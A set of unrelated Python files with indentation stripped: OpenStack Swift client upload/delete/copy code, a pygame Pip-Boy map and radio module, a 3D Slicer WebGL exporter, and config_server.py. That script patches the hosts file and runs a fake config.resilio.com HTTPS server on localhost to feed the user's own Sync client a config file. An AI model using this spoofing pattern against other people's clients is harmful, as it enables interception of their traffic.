to_read -= len(data)
if md5sum.hexdigest() != chunk['hash']:
return False
# Each chunk is verified; check that we're at the end of the file
return not fp.read(1)
def _upload_object_job(self, conn, container, source, obj, options,
results_queue=None):
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
res = {
'action': 'upload_object',
'container': container,
'object': obj
}
if hasattr(source, 'read'):
stream = source
path = None
else:
path = source
res['path'] = path
try:
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
# We need to HEAD all objects now in case we're overwriting a
# manifest object and need to delete the old segments
# ourselves.
old_manifest = None
old_slo_manifest_paths = []
new_slo_manifest_paths = set()
segment_size = int(0 if options['segment_size'] is None
else options['segment_size'])
if (options['changed'] or options['skip_identical']
or not options['leave_segments']):
try:
headers = conn.head_object(container, obj)
is_slo = config_true_value(
headers.get('x-static-large-object'))
if options['skip_identical'] or (
is_slo and not options['leave_segments']):
chunk_data = self._get_chunk_data(
conn, container, obj, headers)
if options['skip_identical'] and self._is_identical(
chunk_data, path):
res.update({
'success': True,
'status': 'skipped-identical'
})
return res
cl = int(headers.get('content-length'))
mt = headers.get('x-object-meta-mtime')
if (path is not None and options['changed']
and cl == getsize(path)
and mt == put_headers['x-object-meta-mtime']):
res.update({
'success': True,
'status': 'skipped-changed'
})
return res
if not options['leave_segments']:
old_manifest = headers.get('x-object-manifest')
if is_slo:
for old_seg in chunk_data:
seg_path = old_seg['name'].lstrip('/')
if isinstance(seg_path, text_type):
seg_path = seg_path.encode('utf-8')
old_slo_manifest_paths.append(seg_path)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Merge the command line header options to the put_headers
put_headers.update(split_headers(options['header'], ''))
# Don't do a segment job if the object is not big enough, and never do
# a segment job if we're reading from a stream - we may fail if we
# go over the single-object limit, but this gives us a nice way
# to create objects from memory.
if (path is not None and segment_size
and (getsize(path) > segment_size)):
res['large_object'] = True
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
full_size = getsize(path)
segment_futures = []
segment_pool = self.thread_manager.segment_pool
segment = 0
segment_start = 0
while segment_start < full_size:
if segment_start + segment_size > full_size:
segment_size = full_size - segment_start
if options['use_slo']:
segment_name = '%s/slo/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
else:
segment_name = '%s/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
seg = segment_pool.submit(
self._upload_segment_job, path, container,
segment_name, segment_start, segment_size, segment,
obj, options, results_queue=results_queue
)
segment_futures.append(seg)
segment += 1
segment_start += segment_size
segment_results = []
errors = False
exceptions = []
for f in interruptable_as_completed(segment_futures):
try:
r = f.result()
if not r['success']:
errors = True
segment_results.append(r)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
errors = True
exceptions.append((err, traceback, err_time))
if errors:
err = ClientException(
'Aborting manifest creation '
'because not all segments could be uploaded. %s/%s'
% (container, obj))
res.update({
'success': False,
'error': err,
'exceptions': exceptions,
'segment_results': segment_results
})
return res
res['segment_results'] = segment_results
if options['use_slo']:
segment_results.sort(key=lambda di: di['segment_index'])
for seg in segment_results:
seg_loc = seg['segment_location'].lstrip('/')
if isinstance(seg_loc, text_type):
seg_loc = seg_loc.encode('utf-8')
new_slo_manifest_paths.add(seg_loc)
manifest_data = json.dumps([
{
'path': d['segment_location'],
'etag': d['segment_etag'],
'size_bytes': d['segment_size']
} for d in segment_results
])
put_headers['x-static-large-object'] = 'true'
mr = {}
conn.put_object(
container, obj, manifest_data,
headers=put_headers,
query_string='multipart-manifest=put',
response_dict=mr
)
res['manifest_response_dict'] = mr
else:
new_object_manifest = '%s/%s/%s/%s/%s/' % (
quote(seg_container.encode('utf8')),
quote(obj.encode('utf8')),
put_headers['x-object-meta-mtime'], full_size,
options['segment_size'])
if old_manifest and old_manifest.rstrip('/') == \
new_object_manifest.rstrip('/'):
old_manifest = None
put_headers['x-object-manifest'] = new_object_manifest
mr = {}
conn.put_object(
container, obj, '', content_length=0,
headers=put_headers,
response_dict=mr
)
res['manifest_response_dict'] = mr
else:
res['large_object'] = False
obr = {}
if path is not None:
content_length = getsize(path)
contents = LengthWrapper(open(path, 'rb'),
content_length,
md5=options['checksum'])
else:
content_length = None
contents = ReadableToIterable(stream,
md5=options['checksum'])
etag = conn.put_object(
container, obj, contents,
content_length=content_length, headers=put_headers,
response_dict=obr
)
res['response_dict'] = obr
if (options['checksum'] and
etag and etag != contents.get_md5sum()):
raise SwiftError('Object upload verification failed: '
'md5 mismatch, local {0} != remote {1} '
'(remote object has not been removed)'
.format(contents.get_md5sum(), etag))
if old_manifest or old_slo_manifest_paths:
drs = []
delobjsmap = {}
if old_manifest:
scontainer, sprefix = old_manifest.split('/', 1)
sprefix = sprefix.rstrip('/') + '/'
delobjsmap[scontainer] = []
for part in self.list(scontainer, {'prefix': sprefix}):
if not part["success"]:
raise part["error"]
delobjsmap[scontainer].extend(
seg['name'] for seg in part['listing'])
if old_slo_manifest_paths:
for seg_to_delete in old_slo_manifest_paths:
if seg_to_delete in new_slo_manifest_paths:
continue
scont, sobj = \
seg_to_delete.split(b'/', 1)
delobjs_cont = delobjsmap.get(scont, [])
delobjs_cont.append(sobj)
delobjsmap[scont] = delobjs_cont
del_segs = []
for dscont, dsobjs in delobjsmap.items():
for dsobj in dsobjs:
del_seg = self.thread_manager.segment_pool.submit(
self._delete_segment, dscont, dsobj,
results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
drs.append(del_seg.result())
res['segment_delete_results'] = drs
# return dict for printing
res.update({
'success': True,
'status': 'uploaded',
'attempts': conn.attempts})
return res
except OSError as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.errno == ENOENT:
error = SwiftError('Local file %r not found' % path, exc=err)
else:
error = err
res.update({
'success': False,
'error': error,
'traceback': traceback,
'error_timestamp': err_time
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Delete related methods
#
def delete(self, container=None, objects=None, options=None):
"""
Delete operations on an account, optional container and optional list
of objects.
:param container: The container to delete or delete from.
:param objects: The list of objects to delete.
:param options: A dictionary containing options to override the global
options specified during the service object creation::
{
'yes_all': False,
'leave_segments': False,
'prefix': None,
}
:returns: A generator for returning the results of the delete
operations. Each result yielded from the generator is either
a 'delete_container', 'delete_object', 'delete_segment', or
'bulk_delete' dictionary containing the results of an
individual delete operation.
:raises: ClientException
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
if container is not None:
if objects is not None:
if options['prefix']:
objects = [obj for obj in objects
if obj.startswith(options['prefix'])]
rq = Queue()
obj_dels = {}
if self._should_bulk_delete(objects):
for obj_slice in n_groups(
objects, self._options['object_dd_threads']):
self._bulk_delete(container, obj_slice, options,
obj_dels)
else:
self._per_item_delete(container, objects, options,
obj_dels, rq)
# Start a thread to watch for delete results
Thread(
target=self._watch_futures, args=(obj_dels, rq)
).start()
# yield results as they become available, raising the first
# encountered exception
res = get_from_queue(rq)
while res is not None:
yield res
# Cancel the remaining jobs if necessary
if options['fail_fast'] and not res['success']:
for d in obj_dels.keys():
d.cancel()
res = get_from_queue(rq)
else:
for res in self._delete_container(container, options):
yield res
else:
if objects:
raise SwiftError('Objects specified without container')
if options['prefix']:
raise SwiftError('Prefix specified without container')
if options['yes_all']:
cancelled = False
containers = []
for part in self.list():
if part["success"]:
containers.extend(c['name'] for c in part['listing'])
else:
raise part["error"]
for con in containers:
if cancelled:
break
else:
for res in self._delete_container(
con, options=options):
yield res
# Cancel the remaining container deletes, but yield
# any pending results
if (not cancelled and options['fail_fast']
and not res['success']):
cancelled = True
def _should_bulk_delete(self, objects):
if len(objects) < 2 * self._options['object_dd_threads']:
# Not many objects; may as well delete one-by-one
return False
try:
cap_result = self.capabilities()
if not cap_result['success']:
# This shouldn't actually happen, but just in case we start
# being more nuanced about our capabilities result...
return False
except ClientException:
# Old swift, presumably; assume no bulk middleware
return False
swift_info = cap_result['capabilities']
return 'bulk_delete' in swift_info
def _per_item_delete(self, container, objects, options, rdict, rq):
for obj in objects:
obj_del = self.thread_manager.object_dd_pool.submit(
self._delete_object, container, obj, options,
results_queue=rq
)
obj_details = {'container': container, 'object': obj}
rdict[obj_del] = obj_details
@staticmethod
def _delete_segment(conn, container, obj, results_queue=None):
results_dict = {}
try:
conn.delete_object(container, obj, response_dict=results_dict)
res = {'success': True}
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_segment',
'container': container,
'object': obj,
'attempts': conn.attempts,
'response_dict': results_dict
})
if results_queue is not None:
results_queue.put(res)
return res
def _delete_object(self, conn, container, obj, options,
results_queue=None):
res = {
'action': 'delete_object',
'container': container,
'object': obj
}
try:
old_manifest = None
query_string = None
if not options['leave_segments']:
try:
headers = conn.head_object(container, obj)
old_manifest = headers.get('x-object-manifest')
if config_true_value(headers.get('x-static-large-object')):
query_string = 'multipart-manifest=delete'
except ClientException as err:
if err.http_status != 404:
raise
results_dict = {}
conn.delete_object(container, obj, query_string=query_string,
response_dict=results_dict)
if old_manifest:
dlo_segments_deleted = True
segment_pool = self.thread_manager.segment_pool
s_container, s_prefix = old_manifest.split('/', 1)
s_prefix = s_prefix.rstrip('/') + '/'
del_segs = []
for part in self.list(
container=s_container, options={'prefix': s_prefix}):
if part["success"]:
seg_list = [o["name"] for o in part["listing"]]
else:
raise part["error"]
for seg in seg_list:
del_seg = segment_pool.submit(
self._delete_segment, s_container,
seg, results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
del_res = del_seg.result()
if not del_res["success"]:
dlo_segments_deleted = False
res['dlo_segments_deleted'] = dlo_segments_deleted
res.update({
'success': True,
'response_dict': results_dict,
'attempts': conn.attempts,
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
return res
@staticmethod
def _delete_empty_container(conn, container):
results_dict = {}
try:
conn.delete_container(container, response_dict=results_dict)
res = {'success': True}
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res = {
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
res.update({
'action': 'delete_container',
'container': container,
'object': None,
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
def _delete_container(self, container, options):
try:
for part in self.list(container=container, options=options):
if not part["success"]:
raise part["error"]
for res in self.delete(
container=container,
objects=[o['name'] for o in part['listing']],
options=options):
yield res
if options['prefix']:
# We're only deleting a subset of objects within the container
return
con_del = self.thread_manager.container_pool.submit(
self._delete_empty_container, container
)
con_del_res = get_future_result(con_del)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
con_del_res = {
'action': 'delete_container',
'container': container,
'object': None,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
yield con_del_res
# Bulk methods
#
def _bulk_delete(self, container, objects, options, rdict):
if objects:
bulk_del = self.thread_manager.object_dd_pool.submit(
self._bulkdelete, container, objects, options
)
bulk_details = {'container': container, 'objects': objects}
rdict[bulk_del] = bulk_details
@staticmethod
def _bulkdelete(conn, container, objects, options):
results_dict = {}
try:
headers = {
'Accept': 'application/json',
'Content-Type': 'text/plain',
}
res = {'container': container, 'objects': objects}
objects = [quote(('/%s/%s' % (container, obj)).encode('utf-8'))
for obj in objects]
headers, body = conn.post_account(
headers=headers,
query_string='bulk-delete',
data=b''.join(obj.encode('utf-8') + b'\n' for obj in objects),
response_dict=results_dict)
if body:
res.update({'success': True,
'result': parse_api_response(headers, body)})
else:
res.update({
'success': False,
'error': SwiftError(
'No content received on account POST. '
'Is the bulk operations middleware enabled?')})
except Exception as e:
res.update({'success': False, 'error': e})
res.update({
'action': 'bulk_delete',
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
# Copy related methods
#
def copy(self, container, objects, options=None):
"""
Copy operations on a list of objects in a container. Destination
containers will be created.
:param container: The container from which to copy the objects.
:param objects: A list of object names (strings) or SwiftCopyObject
instances containing an object name and an
options dict (can be None) to override the options for
that individual copy operation::
[
'object_name',
SwiftCopyObject(
'object_name',
options={
'destination': '/container/object',
'fresh_metadata': False,
...
}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all copy operations
performed by this call, unless overridden on a per
object basis.
The options "destination" and "fresh_metadata" do
not need to be set, in this case objects will be
copied onto themselves and metadata will not be
refreshed.
The option "destination" can also be specified in the
format '/container', in which case objects without an
explicit destination will be copied to the destination
/container/original_object_name. Combining multiple
objects with a destination in the format
'/container/object' is invalid. Possible options are
given below::
{
'meta': [],
'header': [],
'destination': '/container/object',
'fresh_metadata': False,
}
:returns: A generator returning the results of copying the given list
of objects.
:raises: SwiftError
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
# Try to create the container, just in case it doesn't exist. If this
# fails, it might just be because the user doesn't have container PUT
# permissions, so we'll ignore any error. If there's really a problem,
# it'll surface on the first object COPY.
containers = set(
next(p for p in obj.destination.split("/") if p)
for obj in objects
if isinstance(obj, SwiftCopyObject) and obj.destination
)
if options.get('destination'):
destination_split = options['destination'].split('/')
if destination_split[0]:
raise SwiftError("destination must be in format /cont[/obj]")
_str_objs = [
o for o in objects if not isinstance(o, SwiftCopyObject)
]
if len(destination_split) > 2 and len(_str_objs) > 1:
# TODO (clayg): could be useful to copy multiple objects into
# a destination like "/container/common/prefix/for/objects/"
# where the trailing "/" indicates the destination option is a
# prefix!
raise SwiftError("Combination of multiple objects and "
"destination including object is invalid")
if destination_split[-1] == '':
# N.B. this protects the above case
raise SwiftError("destination can not end in a slash")
containers.add(destination_split[1])
policy_header = {}
_header = split_headers(options["header"])
if POLICY in _header:
policy_header[POLICY] = _header[POLICY]
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, cont, headers=policy_header)
for cont in containers
]
# wait for container creation jobs to complete before any COPY
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
copy_futures = []
copy_objects = self._make_copy_objects(objects, options)
for copy_object in copy_objects:
obj = copy_object.object_name
obj_options = copy_object.options
destination = copy_object.destination
fresh_metadata = copy_object.fresh_metadata
headers = split_headers(
options['meta'], 'X-Object-Meta-')
# add header options to the headers object for the request.
headers.update(
split_headers(options['header'], ''))
if obj_options is not None:
if 'meta' in obj_options:
headers.update(
split_headers(
obj_options['meta'], 'X-Object-Meta-'
)
)
if 'header' in obj_options:
headers.update(
split_headers(obj_options['header'], '')
)
copy = self.thread_manager.object_uu_pool.submit(
self._copy_object_job, container, obj, destination,
headers, fresh_metadata
)
copy_futures.append(copy)
for r in interruptable_as_completed(copy_futures):
res = r.result()
yield res
@staticmethod
def _make_copy_objects(objects, options):
copy_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftCopyObject(o, options)
copy_objects.append(obj)
elif isinstance(o, SwiftCopyObject):
copy_objects.append(o)
else:
raise SwiftError(
"The copy operation takes only strings or "
"SwiftCopyObjects as input",
obj=o)
return copy_objects
@staticmethod
def _copy_object_job(conn, container, obj, destination, headers,
fresh_metadata):
response_dict = {}
res = {
'success': True,
'action': 'copy_object',
'container': container,
'object': obj,
'destination': destination,
'headers': headers,
'fresh_metadata': fresh_metadata,
'response_dict': response_dict
}
try:
conn.copy_object(
container, obj, destination=destination, headers=headers,
fresh_metadata=fresh_metadata, response_dict=response_dict)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Capabilities related methods
#
def capabilities(self, url=None, refresh_cache=False):
"""
List the cluster capabilities.
:param url: Proxy URL of the cluster to retrieve capabilities.
:param refresh_cache: If True, bypass any cached result for this URL and
    query the cluster again.
:returns: A dictionary containing the capabilities of the cluster.
:raises: ClientException
"""
if not refresh_cache and url in self.capabilities_cache:
return self.capabilities_cache[url]
res = {
'action': 'capabilities',
'timestamp': time(),
}
cap = self.thread_manager.container_pool.submit(
self._get_capabilities, url
)
capabilities = get_future_result(cap)
res.update({
'success': True,
'capabilities': capabilities
})
if url is not None:
res.update({
'url': url
})
self.capabilities_cache[url] = res
return res
@staticmethod
def _get_capabilities(conn, url):
return conn.get_capabilities(url)
# Helper methods
#
@staticmethod
def _watch_futures(futures, result_queue):
"""
Watches a dict of futures and pushes their results onto the given
queue. We use this to wait for a set of futures which may create
futures of their own to wait for, whilst also allowing us to
immediately return the results of those sub-jobs.
When all futures have completed, None is pushed onto the queue.
If a future is cancelled, we use the dict to return details about
the cancellation.
"""
futures_only = list(futures.keys())
for f in interruptable_as_completed(futures_only):
try:
r = f.result()
if r is not None:
result_queue.put(r)
except CancelledError:
details = futures[f]
res = details
res['status'] = 'cancelled'
result_queue.put(res)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
details = futures[f]
res = details
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
result_queue.put(res)
result_queue.put(None)
|
config_server.py
|
import BaseHTTPServer, SimpleHTTPServer
import ssl
import patch_hosts
import threading
BLOG_URL = "README.md"
class ConfigHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path.strip() == "/sync.conf":
SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
print "Processed request from Sync. Server shutting down..."
assassin = threading.Thread(target=self.server.shutdown)
assassin.daemon = True
assassin.start()
else:
self.send_response(404, 'Not Found')
self.end_headers()
def main():
print "Please refer to %s for detailed instructions." % BLOG_URL
# Step 1
#print "\r\nStep 1: patch hosts file (Admin required)...",
if not patch_hosts.sync_patch_hosts(): return False
#print "Done"
# Step 2
#print "\r\nStep 2: start fake config.resilio.com server..."
httpd = BaseHTTPServer.HTTPServer(('127.0.0.1', 443), ConfigHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, keyfile='./resilio.key', certfile='./resilio.crt', server_side=True)
print "Fake server started."
print "After Sync has requested the config file, this program should go on automatically."
print "If this program blocks here, please refer to %s" % BLOG_URL
print """
*****************************
* Now, please restart Sync. *
*****************************
"""
httpd.serve_forever()
# Step 3
#print "\r\nStep 3: restore hosts file (Admin required)...",
if not patch_hosts.sync_unpatch_hosts(): return False
#print "Done"
return True
if __name__ == '__main__':
if main():
print "\r\nAll done. Sync should have updated the tracker/relay cache."
print "Press Enter to exit."
else:
print "Error and abort."
raw_input()
|
entities.py
|
import os
import game
import config
import pygame
import threading
import pypboy.data
from random import choice
class Map(game.Entity):
_mapper = None
_transposed = None
_size = 0
_fetching = None
_map_surface = None
_loading_size = 0
_render_rect = None
def __init__(self, width, render_rect=None, *args, **kwargs):
self._mapper = pypboy.data.Maps()
self._size = width
self._map_surface = pygame.Surface((width, width))
self._render_rect = render_rect
super(Map, self).__init__((width, width), *args, **kwargs)
text = config.FONTS[14].render("Loading map...", True, (95, 255, 177), (0, 0, 0))
self.image.blit(text, (10, 10))
def fetch_map(self, position, radius):
#(-5.9234923, 54.5899493)
self._fetching = threading.Thread(target=self._internal_fetch_map, args=(position, radius))
self._fetching.start()
def _internal_fetch_map(self, position, radius):
self._mapper.fetch_by_coordinate(position, radius)
self.redraw_map()
def update(self, *args, **kwargs):
super(Map, self).update(*args, **kwargs)
def move_map(self, x, y):
self._render_rect.move_ip(x, y)
def redraw_map(self, coef=1):
self._map_surface.fill((0, 0, 0))
for way in self._mapper.transpose_ways((self._size / coef, self._size / coef), (self._size / 2, self._size / 2)):
pygame.draw.lines(
self._map_surface,
(85, 251, 167),
False,
way,
2
)
for tag in self._mapper.transpose_tags((self._size / coef, self._size / coef), (self._size / 2, self._size / 2)):
if tag[3] in config.AMENITIES:
image = config.AMENITIES[tag[3]]
else:
print "Unknown amenity: %s" % tag[3]
image = config.MAP_ICONS['misc']
image = pygame.transform.scale(image, (10, 10))  # scale() returns a new surface
self._map_surface.blit(image, (tag[1], tag[2]))
text = config.FONTS[12].render(tag[0], True, (95, 255, 177), (0, 0, 0))
self._map_surface.blit(text, (tag[1] + 17, tag[2] + 4))
self.image.blit(self._map_surface, (0, 0), area=self._render_rect)
class MapSquare(game.Entity):
_mapper = None
_size = 0
_fetching = None
_map_surface = None
map_position = (0, 0)
def __init__(self, size, map_position, parent, *args, **kwargs):
self._mapper = pypboy.data.Maps()
self._size = size
self.parent = parent
self._map_surface = pygame.Surface((size * 2, size * 2))
self.map_position = map_position
self.tags = {}
super(MapSquare, self).__init__((size, size), *args, **kwargs)
def fetch_map(self):
self._fetching = threading.Thread(target=self._internal_fetch_map)
self._fetching.start()
def _internal_fetch_map(self):
self._mapper.fetch_grid(self.map_position)
self.redraw_map()
self.parent.redraw_map()
def redraw_map(self, coef=1):
self._map_surface.fill((0, 0, 0))
for way in self._mapper.transpose_ways((self._size, self._size), (self._size / 2, self._size / 2)):
pygame.draw.lines(
self._map_surface,
(85, 251, 167),
False,
way,
1
)
for tag in self._mapper.transpose_tags((self._size, self._size), (self._size / 2, self._size / 2)):
self.tags[tag[0]] = (tag[1] + self.position[0], tag[2] + self.position[1], tag[3])
self.image.fill((0, 0, 0))
self.image.blit(self._map_surface, (-self._size / 2, -self._size / 2))
class MapGrid(game.Entity):
_grid = None
_delta = 0.002
_starting_position = (0, 0)
def __init__(self, starting_position, dimensions, *args, **kwargs):
self._grid = []
self._starting_position = starting_position
self.dimensions = dimensions
self._tag_surface = pygame.Surface(dimensions)
super(MapGrid, self).__init__(dimensions, *args, **kwargs)
self.tags = {}
self.fetch_outwards()
def test_fetch(self):
for x in range(10):
for y in range(5):
square = MapSquare(
100,
(
self._starting_position[0] + (self._delta * x),
self._starting_position[1] - (self._delta * y)
)
)
square.fetch_map()
square.position = (100 * x, 100 * y)
self._grid.append(square)
def fetch_outwards(self):
for x in range(-4, 4):
for y in range(-2, 2):
square = MapSquare(
86,
(
self._starting_position[0] + (self._delta * x),
self._starting_position[1] - (self._delta * y)
),
self
)
square.fetch_map()
square.position = ((86 * x) + (self.dimensions[0] / 2) - 43, (86 * y) + (self.dimensions[1] / 2) - 43)
self._grid.append(square)
def draw_tags(self):
self.tags = {}
for square in self._grid:
self.tags.update(square.tags)
self._tag_surface.fill((0, 0, 0))
for name in self.tags:
if self.tags[name][2] in config.AMENITIES:
image = config.AMENITIES[self.tags[name][2]]
else:
print "Unknown amenity: %s" % self.tags[name][2]
image = config.MAP_ICONS['misc']
image = pygame.transform.scale(image, (10, 10))  # scale() returns a new surface
self.image.blit(image, (self.tags[name][0], self.tags[name][1]))
# try:
text = config.FONTS[12].render(name, True, (95, 255, 177), (0, 0, 0))
# text_width = text.get_size()[0]
# pygame.draw.rect(
# self,
# (0, 0, 0),
# (self.tags[name][0], self.tags[name][1], text_width + 4, 15),
# 0
# )
self.image.blit(text, (self.tags[name][0] + 17, self.tags[name][1] + 4))
# pygame.draw.rect(
# self,
# (95, 255, 177),
# (self.tags[name][0], self.tags[name][1], text_width + 4, 15),
# 1
# )
# except Exception, e:
# print(e)
# pass
def redraw_map(self, *args, **kwargs):
self.image.fill((0, 0, 0))
for square in self._grid:
self.image.blit(square._map_surface, square.position)
self.draw_tags()
class RadioStation(game.Entity):
STATES = {
'stopped': 0,
'playing': 1,
'paused': 2
}
def __init__(self, *args, **kwargs):
super(RadioStation, self).__init__((10, 10), *args, **kwargs)
self.state = self.STATES['stopped']
self.files = self.load_files()
pygame.mixer.music.set_endevent(config.EVENTS['SONG_END'])
def play_random(self):
f = choice(self.files)
self.filename = f
pygame.mixer.music.load(f)
pygame.mixer.music.play()
self.state = self.STATES['playing']
def play(self):
if self.state == self.STATES['paused']:
pygame.mixer.music.unpause()
self.state = self.STATES['playing']
else:
self.play_random()
def pause(self):
self.state = self.STATES['paused']
pygame.mixer.music.pause()
def stop(self):
self.state = self.STATES['stopped']
pygame.mixer.music.stop()
def load_files(self):
files = []
for f in os.listdir(self.directory):
if f.endswith(".mp3") or f.endswith(".ogg") or f.endswith(".wav"):
files.append(self.directory + f)
print files
return files
class GalaxyNewsRadio(RadioStation):
def __init__(self, *args, **kwargs):
self.directory = 'sounds/radio/gnr/'
super(GalaxyNewsRadio, self).__init__(*args, **kwargs)  # super() already binds self
|
WebGLExport.py
|
from __main__ import vtk, qt, ctk, slicer
import sys
import os
import shutil
import time
import uuid
import webbrowser
useWebserver = True
try:
# webserver support for easy display of local WebGL content
# on Windows it might not work, so catch any exceptions
import socket
import SimpleHTTPServer
import SocketServer
import multiprocessing as m
except:
useWebserver = False
# this module uses the following from http://www.quesucede.com/page/show/id/python_3_tree_implementation
#
#
# Python 3 Tree Implementation
#
# Copyright (C) 2011, Brett Alistair Kromkamp - brettkromkamp@gmail.com
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this list
# of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# Neither the name of the copyright holder nor the names of the contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
def sanitize_id( id ): return id.strip().replace( " ", "" )
( _ADD, _DELETE, _INSERT ) = range( 3 )
( _ROOT, _DEPTH, _WIDTH ) = range( 3 )
class Node:
def __init__( self, name, identifier=None, expanded=True ):
self.__identifier = ( str( uuid.uuid1() ) if identifier is None else
sanitize_id( str( identifier ) ) )
self.name = name
self.expanded = expanded
self.__bpointer = None
self.__fpointer = []
@property
def identifier( self ):
return self.__identifier
@property
def bpointer( self ):
return self.__bpointer
@bpointer.setter
def bpointer( self, value ):
if value is not None:
self.__bpointer = sanitize_id( value )
@property
def fpointer( self ):
return self.__fpointer
def update_fpointer( self, identifier, mode=_ADD ):
if mode is _ADD:
self.__fpointer.append( sanitize_id( identifier ) )
elif mode is _DELETE:
self.__fpointer.remove( sanitize_id( identifier ) )
elif mode is _INSERT:
self.__fpointer = [sanitize_id( identifier )]
class Tree:
def __init__( self ):
self.nodes = []
def get_index( self, position ):
for index, node in enumerate( self.nodes ):
if node.identifier == position:
break
return index
def create_node( self, name, identifier=None, parent=None ):
node = Node( name, identifier )
self.nodes.append( node )
self.__update_fpointer( parent, node.identifier, _ADD )
node.bpointer = parent
return node
def show( self, position, level=_ROOT ):
queue = self[position].fpointer
if level == _ROOT:
print( "{0} [{1}]".format( self[position].name,
self[position].identifier ) )
else:
print( "\t" * level, "{0} [{1}]".format( self[position].name,
self[position].identifier ) )
if self[position].expanded:
level += 1
for element in queue:
self.show( element, level ) # recursive call
def expand_tree( self, position, mode=_DEPTH ):
# Python generator. Loosely based on an algorithm from 'Essential LISP' by
# John R. Anderson, Albert T. Corbett, and Brian J. Reiser, page 239-241
yield position
queue = self[position].fpointer
while queue:
yield queue[0]
expansion = self[queue[0]].fpointer
if mode is _DEPTH:
queue = expansion + queue[1:] # depth-first
elif mode is _WIDTH:
queue = queue[1:] + expansion # width-first
def is_branch( self, position ):
return self[position].fpointer
def __update_fpointer( self, position, identifier, mode ):
if position is None:
return
else:
self[position].update_fpointer( identifier, mode )
def __update_bpointer( self, position, identifier ):
self[position].bpointer = identifier
def __getitem__( self, key ):
return self.nodes[self.get_index( key )]
def __setitem__( self, key, item ):
self.nodes[self.get_index( key )] = item
def __len__( self ):
return len( self.nodes )
def __contains__( self, identifier ):
return [node.identifier for node in self.nodes
if node.identifier is identifier]
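# A tiny usage sketch of the Node/Tree helpers above (names are illustrative):
#
#     tree = Tree()
#     tree.create_node("Scene", "scene")                   # root node
#     tree.create_node("Liver", "model1", parent="scene")  # child of the root
#     for node_id in tree.expand_tree("scene"):            # depth-first walk
#         print(tree[node_id].name)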
#
# WebGLExport
#
class WebGLExport:
def __init__( self, parent ):
parent.title = "WebGL Export"
parent.categories = ["Work in Progress"]
parent.contributors = ["Daniel Haehn"]
parent.helpText = """
Export the models in the 3D Slicer scene to WebGL. The WebGL visualization is powered by XTK (<a href='http://goXTK.com'>http://goXTK.com</a>).
<br><br>
Currently color, visibility and opacity of individual models are supported.
<br><br>
More information: <a href='http://github.com/xtk/SlicerWebGLExport'>http://github.com/xtk/SlicerWebGLExport</a>
"""
parent.acknowledgementText = """
Flex, dude!
"""
self.parent = parent
#
# qSlicerPythonModuleExampleWidget
#
